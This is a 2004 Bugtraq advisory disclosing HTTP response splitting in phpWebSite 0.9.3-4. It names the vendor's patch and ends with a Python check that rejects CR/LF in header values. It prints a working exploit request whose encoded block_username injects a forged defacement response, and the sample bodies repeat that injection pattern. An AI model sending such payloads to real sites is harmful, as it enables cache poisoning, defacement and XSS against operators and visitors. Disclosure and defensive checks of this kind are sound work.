List: bugtraq
Subject: security hole (http response splitting) in phpwebsite
From: "Maestro De-Seguridad" <maestrodeseguridad () lycos ! com>
Date: 2004-11-11 19:55:35
Message-ID: 20041111195535.4FBBC3384C () ws7-3 ! us4 ! outblaze ! com
ADVISORY
Author: Maestro (me!)
Date: 11-NOV-04
Vendor: Appalachian State University (http://phpwebsite.appstate.edu/)
Product: phpWebSite 0.9.3-4
Product description (from vendor website):
phpWebSite provides a complete web site content management system. Web-based
administration allows for easy maintenance of interactive, community-driven web
sites. phpWebSite's growing number of modules allow for easy site customization
without the need for unwanted or unused features. Client output from phpWebSite is
valid XHTML 1.0 and meets the W3C's Web Accessibility Initiative requirements.
phpWebSite is written in the PHP Programming Language, making it ideal for developers
to write customized modules.
Problem: HTTP response splitting (web cache poisoning, XSS,
yadayadayada) - http://www.packetstormsecurity.org/papers/general/whitepaper_httpresponse.pdf
Exploit:
POST /index.php HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Content-length: 218
Connection: Keep-Alive
module=user&norm_user_op=login&block_username=%0d%0aContent-Length:%200%0d%0a%0d%0aHTT \
P/1.1%20200%20Ok%0d%0aContent-Length:%2031%0d%0aContent-Type:%20text/html%0d%0a%0d%0a{html}This \
site in 0wned{/html}&password=foobar
(replace curly braces with less-than and greater-than signs)
Vendor status: The vendor fixed this problem (11-NOV-04).
From vendor security mail list:
A security vulnerability was brought to our attention recently and we
have posted a patch to resolve this issue. The patch can be downloaded
from here:
http://phpwebsite.appstate.edu/downloads/security/phpwebsite-core-security-patch2.tar.gz
md5sum: fcefda44a8d691c844593d815479a1ce
This patch should only be applied to versions 0.9.3-2 or greater. All
you need to do is untar the file in the base directory of your
phpwebsite install.
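A defensive check for the class of input shown in the advisory, added here as an example; it is not phpWebSite's patch or code from the advisory. The sample bodies are constructed, and the `Location` header and `/index.php?user=` URL in `location_header` are hypothetical, since the advisory does not say which response header reflects `block_username`.

```python
from urllib.parse import parse_qsl, quote

# Constructed sample bodies (not real traffic). Parameter names follow the
# login request shown in the advisory; the injected header is a harmless marker.
BENIGN_BODY = "module=user&norm_user_op=login&block_username=alice&password=foobar"
SUSPECT_BODY = ("module=user&norm_user_op=login"
                "&block_username=alice%0d%0aX-Constructed-Marker:%201&password=foobar")

# C0 control characters plus DEL; horizontal tab is legal inside a field value.
CONTROL_CHARS = ({chr(c) for c in range(0x20)} | {"\x7f"}) - {"\t"}


def find_header_breakers(body):
    """Return (param, offset, codepoint) for the first control character in each
    percent-decoded form value. CR (0x0d) or LF (0x0a) is what splits a response."""
    hits = []
    for name, value in parse_qsl(body, keep_blank_values=True):
        for offset, ch in enumerate(value):
            if ch in CONTROL_CHARS:
                hits.append((name, offset, f"0x{ord(ch):02x}"))
                break
    return hits


def safe_header_value(value):
    """Fail closed: reject a value that could end the header line, do not strip it."""
    if any(ch in CONTROL_CHARS for ch in value):
        raise ValueError("control character in header value")
    return value


def location_header(user_value):
    """Hypothetical redirect: percent-encode untrusted input placed in a URL, so
    CR/LF reach the client as %0D%0A text and never as a line break."""
    return "Location: /index.php?user=" + safe_header_value(quote(user_value, safe=""))


if __name__ == "__main__":
    for body in (BENIGN_BODY, SUSPECT_BODY):
        print(find_header_breakers(body) or "clean")
    print(location_header("alice\r\nX-Constructed-Marker: 1"))
```

The same two rules apply in any server language: reject control characters in values written into a header as-is, and percent-encode values placed inside a URL.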